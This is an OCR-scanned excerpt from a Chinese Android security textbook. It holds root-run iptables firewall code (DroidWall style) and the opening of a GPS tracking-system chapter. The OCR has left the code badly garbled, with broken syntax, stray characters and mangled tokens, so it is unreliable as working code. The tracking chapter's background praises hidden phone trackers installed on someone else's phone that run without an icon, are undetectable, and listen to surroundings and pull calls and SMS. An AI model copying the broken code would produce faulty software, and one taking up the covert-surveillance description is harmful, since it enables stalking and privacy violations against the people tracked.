final String ITFS_WIFI[] = ( "tiwlan+", "wlan+", "eth+" }; 
final String ITFS 3G[] = ( "rmnet+", "pdp+", "ppp+", "uwbr+", "wimax+", 
"vsnet+" y; 
final SharedPreferences prefs = ctx.getSharedPreferences(PREFS_NAME, 0); 
final boolean whitelist = prefs.getString(PREF MODE, MODE WHITELIST) 
.equals(:MODE WHITELIST); 
final boolean blacklist = !whitelist; 
final boolean logenabled = ctx.getSharedPreferences(PREFS_NAME, 0) 
.getBoolean(PREF LOGENABLED, false); 
final StringBuilder script = new StringBuilder(); 
try { 
int code; 
script.append(scriptHeader(ctx)); 
script.append("" 
+ "$IPTABLES -version || exit 1\n" 
+ "# Create the droidwall chains if necessary" 
+ "$IPTABLES -L droidwall >/dev/null 2>/dev/null || $IPTABLES --пем droidwall || exit 2\n" 
+ "$IPTABLES -L droidwall-3g >/dev/null 2>/dev/null || $IPTABLES —new droidwall-3g || 
exit 3\n" 
+ "$IPTABLES -L droidwall-wifi >/dev/null 2>/dev/null || $IPTABLES --new droidwall-wifi || 
exit 4\n" 
+ "$IPTABLES -L droidwall-reject >/dev/null 2>/dev/null || $IPTABLES --new droidwall 
-reject || exit 5\n" 
+ "# Add droidwall chain to OUTPUT chain if necessary\n" 
+ "$IPTABLES -L OUTPUT | $GREP -q droidwall || $IPTABLES -A OUTPUT -j droidwall || 
exit 6\n" 
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+ "# Flush existing rules\n" 
+ "$IPTABLES -F droidwall || exit 7n" 
+ "$IPTABLES -F droidwall-3g || exit 8\n" 
* "SIPTABLES -F droidwall-wifi || exit 9n" 
+ "SIPTABLES -F droidwall-reject || exit 10\n" + ""); 
/检查 是 否 能 设置 
if (logenabled) { 
script.append("" 
+ "# Create the log and reject rules (ignore errors on the LOG target just in case it is 
not available)\n" 
+ "$IPTABLES -A droidwall-reject -j LOG —log-prefix \"[DROIDWALL] \" —log-uidn" 
+ "SIPTABLES -A droidwall-reject -j REJECT || exit 11\n" 


Bhgr 
) else { 
script.append("" 
+ "# Create the reject rule (log disabled)n" 
+ "$IPTABLES -A droidwall-reject -j REJECT || exit 11 n" 
29} 
} 


if (whitelist && logenabled) ( 
script.append(" Allow DNS lookups on white-list for a better logging (ignore еггогѕ )\п"); 
script.append("$IPTABLES -A droidwall -p udp --dport 53 -j RETURN"); 
} 
script.append("# Main rules (per interface)\n"); 
for (final String itf: ITFS 3G) ( 
script.append("$IPTABLES -A droidwall -o ").append(itf) 
-append(" -j droidwall-3g || exit\n"); 
} 
for (final String itf: ITFS_WIFI) ( 
script.append("$IPTABLES -A droidwall -o ").append(itf) 
-append(" j droidwall-wifi || exit\n"); 
} 
script.append("# Filtering rules\n"); 
final String targetRule = (whitelist ? "RETURN" 
: "droidwall-reject"); 
final boolean any_3g = uids3g.indexOf(SPECIAL_UID_ANY) >= 0; 
final boolean any_wifi = uidsWifi.indexOf(SPECIAL_UID_ANY) >= 0; 
if (whitelist && lany_wifi) { 
// 当 设置 开启 WiFi 时 需要 保证 用 户 允 许 DHCP 和 WiFi 功能 
int uid = android.os.Process.getUidForName("dhcp"); 


if (uid != -1) ( 
script.append("# dhcp user\n"); 
script.append( 
"$IPTABLES -A droidwall-wifi -m owner --uid-owner ") 
-append(uid).append(" -j RETURN || exin"); 
} 
uid = android.os.Process.getUidForName("wifi"); 
if (uid != -1) { 
script.append("# wifi user\n"); 
script.append( 


"$IPTABLES -A droidwall-wifi -m owner --uid-owner ") 


613 


Ш Android 系统 安全 和 反 编译 实 必 


-append(uid).append(" -j RETURN || exit\n"); 
} 
} 
if (any_3g) ( 
if (blacklist) { 
/* block any application on this interface */ 
script.append("$IPTABLES -A droidwall-3g -j ") 
-append(targetRule).append(" || exin"); 
} 
) else { 
A 释放 或 阻拦 在 这 个 接口 各 自 的 应 用 */ 
for (final Integer uid : uids3g) ( 
if (uid >= 0) 
script.append( 
"$IPTABLES -A droidwall-3g -m owner --uid-owner ") 
.append(uid).append(" -j ").append(targetRule) 
-append(" || exit\n"); 
} 
} 
if (any_wifi) { 
if (blacklist) { 
/阻拦 在 这 个 接口 的 所 有 应 用 六 
script.append("$IPTABLES -A droidwall-wifi -j ") 
.append(targetRule).append(" || exit\n"); 
} 
) else { 
“释放 或 阻拦 在 这 个 接口 各 自 的 应 用 */ 
for (final Integer uid : uidsWifi) ( 
if (uid >= 0) 
script.append( 
"$IPTABLES -A droidwall-wifi -m owner —uid-owner ") 
-append(uid).append(" -j ").append(targetRule) 
-append(" || exit\n"); 
} 
} 
if (whitelist) { 
if (lany 39)( 
if (uids3g.indexOf(SPECIAL UID KERNEL) >= 0) ( 
script.append("# hack to allow kernel packets on white-list\n"); 
script.append("$IPTABLES -A droidwall-3g -m owner --uid-owner 0:999999999 -j 
droidwall-reject || exin"); 
) else ( 
script.append("$IPTABLES -A droidwall-3g -j droidwall-reject || exit\n"); 
} 
} 
if (lany wifi) { 
if (uidsWifi.indexOf(SPECIAL_UID_KERNEL) >= 0) { 
script.append("# hack to allow kernel packets on white-list\n"); 
script.append("$IPTABLES -A droidwall-wifi -m owner --uid-owner 0:999999999 -j 
droidwall-reject || exit\n"); 
) else ( 
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script.append("$IPTABLES -A droidwall-wifi -j droidwall-reject || exit\n"); 


} 
}else{ 
if (uids3g.indexOf(SPECIAL UID KERNEL) >= 0) ( 
script.append(" hack to BLOCK kernel packets on black-list\n"); 
script.append("$IPTABLES -A droidwall-3g -m owner --uid-owner 0:999999999 -j RETURN 
|| exit\n"); 
script.append("$IPTABLES -A droidwall-3g -j droidwall-reject || exit\n"); 
} 
if (uidsWifi.indexOf(SPECIAL UID KERNEL) >= 0) { 
script.append(" hack to BLOCK kernel packets on black-list\n"); 
script.append("$IPTABLES -A droidwall-wifi -m owner --uid-owner 0:999999999 -j 
RETURN || exit\n"); 
script.append("$IPTABLES -A droidwall-wifi -j droidwall-reject || exit\n"); 
} 
} 
final StringBuilder res = new StringBuilder(); 
code = runScriptAsRoot(ctx, script.toString(), res); 
if (showErrors && code != 0) { 
String msg = res.toString(); 
Log.e("DroidWall", msg); 


// 清 除 多 余 的 帮助 信息 
if (msg.indexOf("\nTry ‘iptables -h' or 'iptables —help' for more information.") != -1) { 
msg = msg 
.replace( 
"\пТгу ‘iptables -h' or 'iptables —help' for more information." 
"у 
} 
alert(ctx, "Error applying iptables rules. Exit code: " + code 
+ "nw" + msg.trim()); 
) else ( 
return true; 
) 
) catch (Exception e) ( 
if (showErrors) 
alert(ctx, "error refreshing iptables: " + e); 
} 
return false; 


一 


Q 编写 函数 applySavedIptablesRules0， 功 能 是 清除 并 且 重 新 加 写 所 有 规则 ， 此 规则 不 是 在 内 在 中 保存 
的 。 因 为 不 需要 读 安 装 引 用 程序 ， 所 以 此 方法 比 函 数 applyIptablesRulesImpl(0 方 式 快 。 函 数 
applySavedIptablesRules() 的 具体 代码 如 下 所 示 。 

public static boolean applySavedIptablesRules(Context ctx, 

boolean showErrors){ 
if (ctx == null) ( 
return false; 


1 
final SharedPreferences prefs = ctx.getSharedPreferences(PREFS NAME, 0); 


final String savedUids wifi = prefs.getString(PREF WIFI UIDS, ""); 
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final String savedUids 3g = prefs.getString(PREF 3G UIDS, ""); 
final List<Integer> uids wifi = new LinkedList<Integer>(); 
if (savedUids wifi.length() > 0) ( 
/检查 哪些 应 用 使 用 WiFi 
final StringTokenizer tok = new StringTokenizer(savedUids wifi, "|"); 
while (tok.hasMoreTokens()){ 
final String uid = tok.nextToken(); 


if (!uid-equals("")) { 
try { 
uids wifi.add(Integer.parselnt(uid)); 
) catch (Exception ex) ( 
} 
} 


} 
} 
final List<Integer> uids_3g = new LinkedList<Integer>(); 
if (savedUids 3g.length() > 0) { 
/检查 哪些 应 用 允许 2G/3G 服务 
final StringTokenizer tok = new StringTokenizer(savedUids 3g, "|"); 
while (tok.hasMoreTokens()) ( 
final String uid = tok.nextToken(); 


if (luid.equals("")) ( 
try{ 
uids 3g.add(Integer.parselnt(uid)); 
) catch (Exception ex) ( 
} 
} 


} 
} 
return applylptablesRulesImpl(ctx, uids wifi, uids_3g, showErrors); 
) 
О 编写 函数 saveRules(0) 根 据 设置 的 选择 项 保 在 当前 的 规则 ， 有 具体 代码 如 下 所 示 。 
public static void saveRules(Context ctx){ 
final SharedPreferences prefs = ctx.getSharedPreferences(PREFS_NAME, 0); 
final DroidApp[] apps = getApps(ctx); 
// 建 立 被 隔离 的 名 单列 表 
final StringBuilder newuids wifi = new StringBuilder(); 
final StringBuilder newuids 3g = new StringBuilder(); 
for (int i = 0; i < apps.length; i++) { 
if (apps[i].selected wifi) { 
if (newuids wifi.length() != 0) 
newuids_wifi.append('|'); 
newuids wifi.append(apps[i].uid); 
t 
if (apps[i].selected 3g) { 
if (newuids 3g.length() != 0) 
newuids_3g.append('|'); 
newuids_3g.append(apps[i].uid); 
} 


} 
// 除 UIDs 新 的 名 单 之 外 
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final Editor edit = prefs.edit(); 
edit.putString(PREF WIFI UIDS, newuids wifi.toString()); 
edit.putString(PREF 3G UIDS, newuids 3g.toString()); 
edit.commit(); 
» 
O ”编写 函数 purgeIptables0 清 除 所 有 的 过 滤 规 则 ， 有 具体 代码 如 下 所 示 。 
public static boolean purgelptables(Context ctx, boolean showErrors) ( 
StringBuilder res = new StringBuilder(); 
try { 
assertBinaries(ctx, showErrors); 
int code = runScriptAsRoot(ctx, scriptHeader(ctx) 
* "SIPTABLES -F droidwall\n" 
+ "$IPTABLES -F droidwall-reject\n" 
+ "$IPTABLES -F droidwall-3g\n" 
+ "$IPTABLES -F droidwall-wifi\n", res); 
if (code == -1){ 
if (showErrors) 
alert(ctx, "error purging iptables. exit code: " + code 
+"\п" + res); 
return false; 
) 
return true; 
) catch (Exception e) ( 
if (showErrors) 
alert(ctx, "error purging iptables: " + e); 
return false; 
} 
} 
О 编写 函数 clearLog() 清 除 系统 中 的 日 志 记录 信息 ， 有 具体 代码 如 下 所 示 。 
public static boolean clearLog(Context ctx){ 
try { 
final StringBuilder res = new StringBuilder(); 
int code = runScriptAsRoot(ctx, "dmesg -c >/dev/null || exit\n", 
res); 
if (code != 0) { 
alert(ctx, res); 
return false; 
} 
return true; 
} catch (Exception e) { 
alert(ctx, "error: " + e); 
} 
return false; 
} 
О 编写 函数 showLogO 显 示 系 统 中 的 日 志 记录 信息 ， 有 具体 代码 如 下 所 示 。 
public static void showLog(Context ctx){ 
try ( 
StringBuilder res = new StringBuilder(); 
int code = runScriptAsRoot(ctx, scriptHeader(ctx) 
+ "dmesg | $GREP DROIDWALL\n", res); 
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if (code != 0){ 
if (res.length() == 0) ( 
res.append("Log is empty"); 


} 
alert(ctx, res); 
return; 
} 
final BufferedReader r = new BufferedReader(new StringReader( 


res.toString())); 
final Integer unknownUID = -99; 
res = new StringBuilder(); 
String line; 
int start, end; 
Integer appid; 
final HashMap«Integer, Loglnfo> map = new HashMap<Integer, LogInfo>(); 
LogInfo loginfo = null; 
while ((line = r.readLine()) != null) ( 
if (line.indexOf("[DROIDWALL]") == -1) 
continue; 
appid = unknownUID; 
if (((start = line.indexOf("UIDz")) != -1) 
&& ((end = line.indexOf(" ", start)) != -1)) { 
appid - Integer.parselnt(line.substring(start * 4, end)); 
} 
loginfo = map.get(appid); 
if (loginfo == null) ( 
loginfo = new Loglnfo(); 
map.put(appid, loginfo); 
) 
loginfo.totalBlocked += 1; 
if (((start = line.indexOf("DST=")) {= -1) 
&& ((end = line.indexOf(" ", start)) != -1)) ( 
String dst = line.substring(start + 4, end); 
if (loginfo.dstBlocked.containsKey (dst)) ( 
loginfo.dstBlocked.put(dst, 
loginfo.dstBlocked.get(dst) + 1); 
) else ( 
loginfo.dstBlocked.put(dst, 1); 
} 
} 
} 
final DroidApp[ ] apps = getApps(ctx); 
for (Integer id : map.keySet()) { 
res.append("App ID "); 
if (id != unknownUID) ( 
res.append(id); 
for (DroidApp app : apps) { 
if (app.uid == id) { 
res.append(" (").append(app.names[0]); 
if (app.names.length > 1) ( 
res.append(", ...)"); 
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) else { 
res.append(")"); 
} 
break; 
} 
} 
) else { 
res.append("(kernel)"); 


} 
loginfo = map.get(id); 
res.append(" - Blocked ").append(loginfo.totalBlocked) 
.append(" packets"); 
if (loginfo.dstBlocked.size() > 0) ( 
res.append(" ("); 
boolean first = true; 
for (String dst : loginfo.dstBlocked.keySet()) { 
if (гї) { 
res.append(", "); 
} 
res.append(loginfo.dstBlocked.get(dst)) 
-append(" packets for ").append(dst); 


first = false; 
} 
res.append(")"); 
} 
res.append("\n\n"); 


} 

if (res.length() == 0) { 
res.append("Log is empty"); 

} 


alert(ctx, res); 
} catch (Exception e) { 
alert(ctx, "error: " + е); 
} 
} 
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О 编写 函数 hasRootAccess() 检 查 是 否 具备 进入 根 目 录 的 权限 ， 具 体 代码 如 下 所 示 。 


public static boolean hasRootAccess(Context ctx, boolean showErrors) { 
if (hasroot) 
return true; 
final StringBuilder res = new StringBuilder(); 
try ( 
// Run an empty script just to check root access 
if (runScriptAsRoot(ctx, "exit 0", res) == 0) ( 
hasroot = true; 
return true; 
} 
} catch (Exception e) { 
} 
if (showErrors) { 
alert(ctx, 
"Could not acquire root access.\n" 
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+ "You need a rooted phone to run DroidWall.\n\n" 
* "If this phone is already rooted, please make sure DroidWall has enough 
permissions to execute the \"su\" command.\n" 
+ "Error message: " + res.toString()); 
} 
return false; 
} 
О 编写 函数 runScript0 执 行 前 面 编写 的 Script 脚本 头 程序 ， 此 函数 比较 具有 代表 意义 ， 能 够 在 Android 
中 调用 并 执行 Script 程序 。 函 数 runScript0 的 具体 代码 如 下 所 示 。 
public static int runScript(Context ctx, String script, StringBuilder res, 
long timeout, boolean asroot) ( 
final File file = new File(ctx.getDir("bin", 0), SCRIPT FILE); 
final ScriptRunner runner = new ScriptRunner(file, script, res, asroot); 
runner.start(); 


try { 
if (timeout > 0) { 
runner.join(timeout); 
) else { 
runner.join(); 
р 
if (runner.isAlive()) ( 
// 设 置 超时 
runner.interrupt(); 
runner.join(150); 
runner.destroy(); 
runner.join(50); 
} 
} catch (InterruptedException ex) { 
} 


return runner.exitcode; 
} 
О 编写 函数 runScriptAsRoot0， 功 能 是 在 Root 权限 下 执行 脚本 程序 ， 有 具体 代码 如 下 所 示 。 
public static int runScriptAsRoot(Context ctx, String script, 
StringBuilder res, long timeout) ( 
return runScript(ctx, script, res, timeout, true); 
} 
O 编写 函数 runScript()， 功 能 是 设置 普通 用 户 权限 执行 脚本 程序 ， 具 体 代码 如 下 所 示 。 
public static int runScript(Context ctx, String script, StringBuilder res) 
throws IOException { 
return runScript(ctx, script, res, 40000, false); 
} 
O 编写 函数 assertBinaries()， 功 能 是 断言 二 进 制 文件 在 高 速 缓 存 目录 被 安装 ， 具 体 代码 如 下 所 示 。 
public static boolean assertBinaries(Context ctx, boolean showErrors) ( 
boolean changed - false; 
try { 
1 检查 iptables armv5 Ёё 
File file = new File(ctx.getDir("bin", 0), "iptables armv5"); 
if (ffile.exists()) { 
copyRawFile(ctx, R.raw.iptables armv5, file, "755"); 
changed - true; 
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} 
/检查 busybox 
file = new File(ctx.getDir("bin", 0), "busybox_g1"); 
if (!file.exists()) { 
copyRawFile(ctx, R.raw.busybox_g1, file, "755"); 
changed = true; 
} 
if (changed) { 
Toast.makeText(ctx, R.string.toast_bin_installed, 
Toast.LENGTH_LONG).show(); 
} 
} catch (Exception e) { 
if (showErrors) 
alert(ctx, "Error installing binary files: " + e); 
return false; 
} 
return true; 


} 
21.34 系统 广播 文件 


编写 文件 BootBroadcast.java， 此 文件 是 一 个 广播 文件 ， 在 3 
则 中 并 没有 设置 开启 显示 信息 ， 所 以 使 用 广播 功能 显示 设置 信 
下 所 示 。 

import android.content.BroadcastReceiver; 

import android.content.Context; 

import android.content.Intent; 

import android.os.Handler; 

import android.os.Message; 

import android.widget.Toast; 

public class BootBroadcast extends BroadcastReceiver ( 


统 执行 后 将 广播 ptables 规则 。 因 为 在 规 
\。 文 件 BootBroadcastjava 的 主要 代码 如 


public void onReceive(final Context context, final Intent intent){ 
if (Intent.ACTION_BOOT_ COMPLETED.equals(intent.getAction())) { 
if (Api.isEnabled(context)) { 
final Handler toaster = new Handler() { 
public void handleMessage(Message msg){ 
if (msg.arg1 != 0) 
Toast.makeText(context, msg.arg1, 
ToastLENGTH SHORT)show(); 


H 
y 
/开启 新 线程 阻止 防火 墙 
new Thread(){ 
@Override 


public void run() í 
if (!Api.applySavedIptablesRules(context, false)) ( 
11 Error enabling firewall on boot 
final Message msg = new Message(); 
msg.arg1 = R.string.toast error enabling; 


М. 系统 安全 和 反 编译 实 点 


toaster.sendMessage(msg); 
Api.setEnabled(context, false); 


)-start(); 


} 
} 
Жн 30 PackageBroadcast.java, ЖЖ СЙ ҢЫ УА TRUE tF. SEP BLE 
后 ， 会 在 防火 墙 中 删除 针对 此 软件 的 设置 规则 。 文 件 PackageBroadcast.java 的 主要 代码 如 下 所 示 。 
import android.content.BroadcastReceiver; 
import android.content.Context; 
import android.content.Intent; 


public class PackageBroadcast extends BroadcastReceiver ( 


@Override 
public void onReceive(Context context, Intent intent) ( 
if (IntenLACTION PACKAGE REMOVED.equals(intent.getAction())) ( 
// 忽 略 应 用 更 新 
final boolean replacing = intent.getBooleanExtra(Intent.EXTRA REPLACING, false); 
if (Ireplacing) { 
final int uid = intent.getIntExtra(Intent.EXTRA UID, -123); 
Api.applicationRemoved(context, uid); 


} 
21.3.5 ”登录 验证 


编写 文件 PassDialogjava， 功 能 是 在 输入 密码 对 话 框 中 获取 用 户 输入 的 密码 ， 只 有 输入 合法 的 密码 数据 
才能 登录 系统 。 文 件 PassDialog java 的 主要 代码 如 下 所 示 。 
public class PassDialog extends Dialog implements android.view.View.OnClickListener, 
android.view.View.OnKeyListener, OnCancelListener ( 
private final Callback callback; 
private final EditText pass; 
/* 创 建 一 个 对 话 框 */ 
public PassDialog(Context context, boolean setting, Callback callback) { 
super(context); 
final View view = getLayoutlnflater().inflate(R.layout.pass dialog, null); 
((TextView)view.findViewByld(R.id.pass_message)).setText(setting ? R.string.enternewpass : 
R.string.enterpass); 
((Button)view.findViewByld(R.id.pass ok)).setOnClickListener(this); 
((Button)view.findViewByld(R.id.pass cancel)).setOnClickListener(this); 
this.callback = callback; 
this.pass = (EditText) view.findViewByld(R.id.pass input); 
this.pass.setOnKeyListener(this); 
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setTitle(setting ? R.string.pass_titleset : R.string.pass_titleget); 


setOnCancelListener(this); 
setContentView(view); 

} 

@Override 


public void onClick(View v) { 
final Message msg = new Message(); 
if (v.getld() == R.id.pass_ok) { 
msg.obj = this.pass.getText().toString(); 


} 
dismiss(); 
this.callback.handleMessage(msg); 
} 
@Override 


public boolean onKey(View v, int keyCode, KeyEvent event) { 
if (KeyCode == KeyEvent.KEYCODE_ENTER) { 
final Message msg = new Message(); 
msg.obj = this.pass.getText().toString(); 
this.callback.handleMessage(msg); 


dismiss(); 
return true; 
1 
return false; 
} 
@Override 


public void onCancel(Dialoglnterface dialog) ( 
this.callback.handleMessage(new Message()); 
) 
) 


21.3.6 ”打开 /关闭 某 一 个 实施 控件 


编写 文件 StatusWidget.java， 功 能 是 打开 或 关闭 某 一 个 实施 控件 ， 主 要 代码 如 下 所 示 。 
public class StatusWidget extends AppWidgetProvider { 
@Override 
public void onReceive(final Context context, final Intent intent) { 
super.onReceive(context, intent); 
if (Api.STATUS CHANGED MSG.equals(intent.getAction())) ( 
// 当 防火 墙 状态 改变 时 马上 广播 信息 
final Bundle extras = intent.getExtras(); 
if (extras != null && extras.containsKey(Api.STATUS EXTRA)) ( 
final boolean firewallEnabled = extras 
.getBoolean(Api.STATUS EXTRA); 
final AppWidgetManager manager = AppWidgetManager 
.getinstance(context); 
final int[ ] widgetlds = manager 
.getAppWidgetlds(new ComponentName(context, 
StatusWidget.class)); 
showWidget(context, manager, widgetlds, firewallEnabled); 
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} 
} else if (Api. TOGGLE REQUEST MSG.equals(intent.getAction())) { 
// 根 据 防火 墙 开关 信息 广播 状态 信息 
final SharedPreferences prefs = context.getSharedPreferences( 
Api.PREFS_NAME, 0); 
final boolean enabled = !prefs.getBoolean(Api.PREF ENABLED, true); 
final String pwd = prefs.getString(Api.PREF PASSWORD, ""); 
if (lenabled && pwd.length() != 0) ( 
Toast.makeText(context, 
"Cannot disable firewall - password defined!", 
Toast.LENGTH SHORT).show(); 
retum; 
} 
final Handler toaster = new Handler() { 
public void handleMessage(Message msg) ( 
if (msg.arg1 != 0) 
Toast.makeText(context, msg.arg1, Toast.LENGTH SHORT) 


.show(); 
} 
k 
// 开 启 新 线程 改变 防火 墙 
new Thread() ( 
@Override 
public void run() { 
final Message msg = new Message(); 
if (enabled) ( 
if (Api.applySavedIptablesRules(context, false)) { 
msg.arg1 = R.string.toast_enabled; 
toaster.sendMessage(msg); 
) else ( 
msg.arg1 = R.string.toast_error_enabling; 
toaster.sendMessage(msg); 
return; 
} 
}else { 
if (Api.purgelptables(context, false)) { 
msg.arg1 = R.string.toast_disabled; 
toaster.sendMessage(msg); 
}else ( 
msg.arg1 = R.string.toast_error_disabling; 
toaster.sendMessage(msg); 
return; 
} 
} 
Api.setEnabled(context, enabled); 
} 
}.start(); 
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@Override 
public void onUpdate(Context context, AppWidgetManager appWidgetManager, 
int[ ] ints) ( 
super.onUpdate(context, appWidgetManager, ints); 
final SharedPreferences prefs = context.getSharedPreferences( 
Api.PREFS NAME, 0); 
boolean enabled = prefs.getBoolean(Api.PREF ENABLED, true); 
showWidget(context, appWidgetManager, ints, enabled); 
} 


private void showWidget(Context context, AppWidgetManager manager, 
int[ ] widgetlds, boolean enabled) { 
final RemoteViews views = new RemoteViews(context.getPackageName(), 
R.layout.onoff_widget); 
final int iconid = enabled ? R.drawable.widget_on 
: R.drawable.widget_off; 
views.setlmageViewResource(R.id.widgetCanvas, iconld); 
final Intent msg = new Intent(Api. TOGGLE REQUEST MSG); 
final PendingIntent intent = Pendinglntent.getBroadcast(context, -1, 
msg, PendingIntent.FLAG UPDATE CURRENT); 
views.setOnClickPendingIntent(R.id.widgetCanvas, intent); 
manager.updateAppWidget(widgetlds, views); 
} 
Ш 
到 此 为 止 ， 整 个 网 络 流量 防火 墙 系统 介绍 完毕 。 执 行 后 的 主 界面 效果 如 图 21-5 所 示 ， 按 下 Menu 键 后 
会 弹出 设置 选项 卡 ， 如 图 21-6 所 示 。 
单 击 选项 卡 中 的 Firewall disabled 按钮 可 以 打开 /关闭 防火 墙 ， 单 击 选项 卡 中 的 Log enabled 按钮 可 以 打 
开 / 关 闭 日 志 ， 单 击 选项 卡 中 的 Save rules 按钮 会 弹出 保存 进度 条 ， 如 图 21-7 所 示 。 


Mode: Black list (block selected) 
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215 主 界面 图 21-6 弹出 设置 选项 卡 图 21-7 保存 规则 进度 条 


单 击 选项 卡 中 的 国 } 按 钮 会 退出 当前 系统 ， 单 击 选项 卡 中 的 国术 钮 会 弹出 帮助 对 话 框 界面 ， 如 图 21-8 
所 示 。 
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单 击 选项 卡 中 的 图 | 按钮 会 弹出 一 个 新 的 对 话 框 , 如 图 21-9 所 示 。 在 此 对 话 框 中 可 以 选择 实现 其 他 功能 ， 
例如 ， 选 择 “Set password” 选 项 后 会 弹出 一 个 设置 密码 界面 ， 如 图 21-10 所 示 。 


Show log Set password lock 


Enter the new password (leave blank 
Show rules to remove): 


Clear log | 


图 21-8 帮助 对 话 框 界面 图 21-9 新 功能 对 话 杠 图 21-10 设置 密码 界面 


risa et password 


Bees 跟踪 定位 系统 


跟踪 定位 系统 其 实 并 没有 影视 剧 中 描述 的 那样 神秘 ， 是 指 利 用 GPS 卫星 定位 终端 对 远程 目标 实现 准确 
定位 、 实 时 追踪 、 远 程 监听 和 防盗 反动 等 功能 。 在 本 章 的 内 容 中 ， 将 详细 讲解 开发 一 个 Android 跟踪 定位 系 
统 的 知识 。 在 讲解 具体 编码 之 前 ， 先 简要 介绍 本 项 目的 产生 背景 和 项 目 意义 ， 为 后 面 的 系统 设计 及 编码 工 
作 做 准备 。 


22.1 背景 介绍 


ER 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 22 章 \ 背 景 介绍 .avi 

随 着 GPS 技术 的 不 断 发 展 和 进步 ， 卫 星 跟踪 定位 器 被 逐渐 用 于 民用 、 商 业 和 军事 项 目 中 。 用 户 可 以 通 
过 手机 、 网 络 、PDA 等 随时 随地 查询 目标 位 置 ， 并 实时 跟踪 目标 移动 方向 ， 监 听 周围 5—15 米内 的 声音 ， 
无 论 目标 在 房间 或 地 下 室 ， 都 可 精确 定位 。 随 着 智能 设备 的 发 展 ， 跟 踪 设备 可 随意 粘 附 于 汽车 底盘 或 其 他 
需 追 踪 定位 的 物体 之 下 ， 易 于 隐藏 ， 便 于 携带 ， 可 全 国定 位 、 实 时 追踪 目标 、 轨 迹 回放 ， 老 人 小 孩 均 可 携 
带 ， 可 用 于 刑侦 追踪 等 。 不 管 目标 在 沙漠 、 森 林 、 海 洋 还 是 山区 ， 均 能 轻松 实现 定位 ， 轻 松 找到 目标 。 

在 现实 应 用 中 ， 有 如 下 两 类 主流 定位 跟踪 系统 。 

(1) 跟踪 定位 器 

这 类 产品 主要 用 于 汽车 等 行驶 工具 中 , 通常 需要 在 这 类 定位 器 上 插 一 张 CDMA F, # Е GPS 信号 天 线 
和 СОМА 信号 天 线 ， 接 上 汽车 的 电源 就 可 以 工作 了 ， 如 果 需 要 断 油 断 电 功 能 ， 还 可 以 将 主机 的 断 油 断 电 控 
制 线 接 上 ， 就 可 以 实现 这 两 个 功能 了 。 

例如 ， 国 产 产品 卫 通 达 。 这 是 国内 首 款 语音 彩信 GPS 定位 器 ， 内 置 全 国 的 地 图 数据 ， 无 需 后 台 支 持 ， 
结合 了 GPS 全 球 定位 系统 、GSM 通信 技术 、 翌 入 式 语音 播报 技术 、GIS BOR. GIS 搜索 引擎 、 图 像 处 理 技 
术 和 图 像 传输 技术 ， 直 接 回 复 终端 中 文 地 址 、 彩 信 或 语音 播报 地 理 位 置 。 
卫 通 达 采 用 手机 LBS 基站 定位 技术 的 跟踪 定位 器 ， 基 于 SAAS 模式 ， 无 需 安装 GPS 等 设备 ， 把 手机 号 
码 注册 进 系统 中 即 可 对 该 手机 进行 定位 。 这 种 跟踪 定位 器 广泛 应 用 在 物流 行业 ， 物 流 调 度 把 承运 车 主 的 手 
机 号 码 注册 进 路 歌 管 车 宝 软件 ， 可 以 实时 对 该 车 辆 进行 定位 ， 其 定位 精度 完全 满足 物流 人 员 对 定位 、 追 踪 
的 要 求 ， 深 受 物流 调度 管理 人 员 喜 爱 。 卫 通达 汽车 跟踪 器 的 安装 方法 如 下 所 示 。 

口 将 GPS 主机 和 汽车 的 主 电源 线 连 接 起 来 。 

O 插 上 准备 好 的 电话 卡 。 

а 登录 平台 开始 定位 。 

(2) 手机 跟踪 器 

近年 来 ， 随 着 Android 和 iOS 等 智能 系统 的 兴起 和 普及 ,通过 在 手机 上 安装 跟踪 系统 的 方法 ,可 以 实现 
实时 跟踪 手机 持 有 人 的 功能 。 现 在 很 多 智能 手机 中 都 内 置 了 这 类 APP， 这 样 在 手机 丢失 后 可 以 迅速 定位 手 
机 的 位 置 。 

例如 ， 给 对 方 手机 安装 上 服务 端 ， 服 务 端 没 有 任何 显示 图 标 ， 开 机 自动 启动 ， 极 为 隐秘 不 可 能 被 察觉 。 
安装 成 功 后 ， 通 过 软件 就 能 查看 到 对 方 的 位 置 了 。 可 实时 查看 家 人 的 位 置 ， 并 且 可 以 远程 开启 自动 通话 


хеее 


实时 侦 听 周围 语音 动态 ， 让 其 周边 状况 尽 在 掌握 。 远 程 获取 对 方 最 近 的 通话 记录 ， 包 括 删 除 的 记录 。 可 以 
远程 获取 对 方 最 近 的 短信 聊天 记录 ,包括 删除 的 记录 。 同 时 支持 GPS/3G/WiFi 3 种 形式 定位 ， 定 位 精度 可 以 
达到 仅 几 米 之 内 ， 也 支持 对 方 在 不 开启 网 络 的 情况 下 同样 能 够 定位 。 使 用 过 程 中 需要 发 送 普通 短信 指令 给 
对 方 手机 ， 对 方 手 机 也 只 会 回 传 普通 短信 给 用 户 的 手机 。 

本 章 的 实例 就 属于 上 述 第 二 类 应 用 程序 。 


22.2 系统 模块 架构 


GE 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 22 章 \ 系 统 模块 架构 .avi 

本 实例 的 功能 是 ,在 Android 系统 中 开发 一 个 定位 跟踪 系统 ， 当 有 危险 性 的 突 发 事件 发 生 时 ， 按 下 应 用 
程序 的 按钮 后 就 会 定位 当前 位 置 ， 并 开始 录制 5 秒 钟 的 有 声 视频 ， 自 动向 警方 或 朋友 发 送 位 置信 息 和 视频 
信息 。 本 应 用 程序 还 可 以 激活 Web 服务 器 ， 将 录制 的 视频 发 送 到 Web 站 点 中 。 

本 章 定 位 跟踪 系统 的 构成 模块 结构 如 图 22-1 所 示 。 
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(1) 系统 性 能 需求 
根据 Android 手机 系统 要 求 无 响应 时 间 为 5 秒 ， 就 有 如 下 性 能 要 求 。 
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选择 模式 设置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 

勾 选 应 用 设置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 

防火 墙 开关 设置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 
日 志 开关 设置 ， 程 序 响 应 时 间 最 长 不 能 超过 5 秒 。 

保存 规则 设置 ， 程 序 响应 时 间 最 长 不 能 超过 5 秒 。 

(2) 运行 环境 需求 

口 操作 系统 ，Android 手 机 基于 Linux 操 作 系 统 。 

О 支持 环境 : Android 4.0 及 以 上 版 本 。 

口 开发 环境 : Eclipse 3.5 ADT 0.95. 
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E 知识 点 讲解 : 光盘 :视频 \ 知 识 点 \ 第 22 章 \ 实 现 系统 主 界面 .avi 
